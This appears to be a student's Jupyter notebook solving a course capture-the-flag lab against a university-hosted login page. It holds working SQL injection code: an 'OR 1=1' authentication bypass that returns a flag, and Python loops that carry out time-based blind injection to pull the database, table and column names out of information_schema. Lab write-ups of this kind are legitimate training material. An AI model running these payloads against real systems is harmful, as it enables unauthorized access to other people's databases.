In [1]:
import requests
import time
from string import ascii_lowercase, ascii_uppercase

In [2]:
#url = "http://shepherd.ii.uib.no:8001/signIn"
url = "http://shepherd.ii.uib.no:8002/signIn"

In [3]:
data = {'inputName':"admin' OR 1=1#", 'inputPassword':"anything"}
result = requests.post(url, data)
print(result.text)

{"gg": "GG! Flag: inf226{s0_y0u_c4n_b4s1c_5q71}!"}


In [4]:
for i in range(15):
    data = {'inputName':"a' OR (SELECT sleep(1) FROM dual WHERE length(database())=" + str(i) + ") #", 
            'inputPassword':"password"}
    start = time.time()
    result = requests.post(url, data)
    end = time.time()
    delay = end - start
    print("check length: " + str(i) + " -> delay: " + str(delay) + " reply: " + result.text)

check length: 0 -> delay: 0.048868656158447266 reply: {"info": "no feedback for you this time!"}
check length: 1 -> delay: 0.0468745231628418 reply: {"info": "no feedback for you this time!"}
check length: 2 -> delay: 0.04587745666503906 reply: {"info": "no feedback for you this time!"}
check length: 3 -> delay: 0.046875 reply: {"info": "no feedback for you this time!"}
check length: 4 -> delay: 0.043882131576538086 reply: {"info": "no feedback for you this time!"}
check length: 5 -> delay: 0.0468747615814209 reply: {"info": "no feedback for you this time!"}
check length: 6 -> delay: 0.047872066497802734 reply: {"info": "no feedback for you this time!"}
check length: 7 -> delay: 0.04487967491149902 reply: {"info": "no feedback for you this time!"}
check length: 8 -> delay: 0.04886937141418457 reply: {"info": "no feedback for you this time!"}
check length: 9 -> delay: 0.04587817192077637 reply: {"info": "no feedback for you this time!"}
check length: 10 -> delay: 0.04687356948852539 rep

In [198]:
db_name = ""
for i in range(13):
    for c in ascii_lowercase:
        data = {'inputName':"a' OR (SELECT sleep(0.2) FROM dual WHERE database() LIKE '" 
                + "_"*i + c + "_"*(12-i) + "') #",
                'inputPassword':"password"}
        start = time.time()
        result = requests.post(url, data)
        end = time.time()
        delay = end - start
        if delay > 0.2: db_name = db_name + c
        
print(db_name)

timebasedsqli


## Table names
There are several tables, find their names

In [137]:
# guess table name made up of given prefix + any character a-z + %
# return the set of characters for which these are true (true if the delay is more than the sleep value)
def guess_next(prefix):
    s = ""
    for c in ascii_lowercase:
        data = {'inputName':"a' OR (SELECT sleep(0.2) FROM information_schema.tables WHERE " + 
                "table_name LIKE '" + prefix + c + "%') #",
                'inputPassword':"p"}
        start = time.time()
        result = requests.post(url, data)
        end = time.time()
        delay = end - start
        if delay > 0.2: s = s + c
    return s

In [147]:
# build a list of strings based on guessing the next characters
# when more than one guess is true for the next character, 
# create a string for each true guess and continue on the original, 
# appending the new to the end of list for later
def find_tables(starting_char):
    names = []
    names.append(starting_char)
    
    for i in range(len(names)):
        while True:
            res = guess_next(names[i])
            if len(res) == 0: 
                res = guess_next(names[i] + "_")
                if len(res) == 0: break
                else: names[i] = names[i] + "_"
            if len(res) == 1:
                names[i] = names[i] + res
            if len(res) > 1:
                names[i] = names[i] + res[0]
                for j in range(1, len(res)):
                    names.append(names[i] + res[j])
                    
    return names

In [142]:
# get the first letters of all table names
table_names = []
first_characters = guess_next("")
first_characters = list(first_characters)

In [143]:
print(first_characters)

['c', 'e', 'f', 'g', 'i', 'k', 'o', 'p', 'r', 's', 't', 'u', 'v']


In [175]:
# due to network limitations (timeout / too many requests), we cant run all at the same time, 
# so run the function for each starting letter separately
table_names.extend(find_tables(first_characters[12]))

In [176]:
print(table_names)

['character_sets', 'cho', 'engines', 'env', 'files', 'global_status', 'global_sv', 'innodb_buffer_page_lru', 'innodb_bc', 'innodb_bf', 'innodb_bl', 'innodb_bm', 'innodb_bs', 'innodb_bt', 'innodb_buffer_pao', 'key_column_usage', 'optimizer_trace', 'parameters', 'pal', 'par', 'parat', 'referential_constraints', 'reo', 'schemata', 'sce', 'sct', 'tablespaces', 'tab', 'tar', 'user_privileges', 'views']


## Column names

In [122]:
def guess_next_col(prefix, tablename):
    s = ""
    for c in ascii_lowercase:
        data = {'inputName':"a' OR (SELECT sleep(0.3) FROM information_schema.columns WHERE " + 
                "column_name LIKE '" + prefix + c + "%' AND table_name='" + tablename + "') #",
                'inputPassword':"p"}
        start = time.time()
        result = requests.post(url, data)
        end = time.time()
        delay = end - start
        if delay > 0.3: s = s + c
    return s

In [125]:
def get_col_names(table_name):
    col_names = []
    first_characters = guess_next_col("", table_name)
    for c in first_characters:
        col_names.append("" + c)

    for i in range(len(col_names)):
        while True:
            res = guess_next_col(col_names[i], table_name)
            if len(res) == 0: 
                res = guess_next_col(col_names[i] + "_", table_name)
                if len(res) == 0: break
                else: col_names[i] = col_names[i] + "_"
            if len(res) == 1:
                col_names[i] = col_names[i] + res
            if len(res) > 1:
                col_names[i] = col_names[i] + res[0]
                for j in range(1, len(res)):
                    col_names.append(col_names[i] + res[j])

    return col_names

In [126]:
user_p_columns = get_col_names("user_privileges")

In [160]:
key_c_columns = get_col_names("key_column_usage")

In [161]:
print(user_p_columns)
print(key_c_columns)

['grantee', 'is_grantable', 'privilege_type', 'table_catalog']
['column_name', 'ordinal_position', 'position_in_unique_constraint', 'referenced_column_name', 'table_catalog', 'coln', 'referenced_ct', 'table_cn', 'table_cs']


In [227]:
columns = get_col_names("parameters")
print(columns)

['character_maximum_length', 'data_type', 'numeric_precision', 'ordinal_position', 'parameter_mode', 'routine_type', 'specific_catalog', 'cho', 'character_mo', 'character_ms', 'dat', 'datae', 'numeric_ps', 'parameter_mn', 'specific_cn', 'specific_cs']


## Search in column

In [248]:
for c in ascii_lowercase:
    data = {'inputName':"a' OR (SELECT sleep(0.5) FROM user_privileges WHERE " + 
                "grantee LIKE '" + c + "%') #",
            'inputPassword':"p"}
    start = time.time()
    result = requests.post(url, data)
    end = time.time()
    delay = end - start

    print(str(result)[10:15] + " | " + c + ": " + str(delay))

[500] | a: 0.07081031799316406
[500] | b: 0.0688161849975586
[500] | c: 0.06582355499267578
[500] | d: 0.0688161849975586
[500] | e: 0.06582403182983398
[500] | f: 0.06582403182983398
[500] | g: 0.06881570816040039
[500] | h: 0.06682133674621582
[500] | i: 0.06682133674621582
[500] | j: 0.071807861328125
[500] | k: 0.06781864166259766
[500] | l: 0.06682133674621582
[500] | m: 0.06682133674621582
[500] | n: 0.06682109832763672
[500] | o: 0.06682157516479492
[500] | p: 0.07579731941223145
[500] | q: 0.06781840324401855
[500] | r: 0.06781840324401855
[500] | s: 0.06781911849975586
[500] | t: 0.06582331657409668
[500] | u: 0.0688161849975586
[500] | v: 0.06682109832763672
[500] | w: 0.0688161849975586
[500] | x: 0.07081055641174316
[500] | y: 0.06781959533691406
[500] | z: 0.06781768798828125


In [247]:
data = {'inputName':"a' OR IF(((SELECT COUNT(*) FROM key_column_usage) = 0), sleep(1), 0) # ",
        'inputPassword':"p"}
start = time.time()
result = requests.post(url, data)
end = time.time()
delay = end - start

print(str(result.text))
print(delay)

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>500 Internal Server Error</title>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>

0.07278561592102051
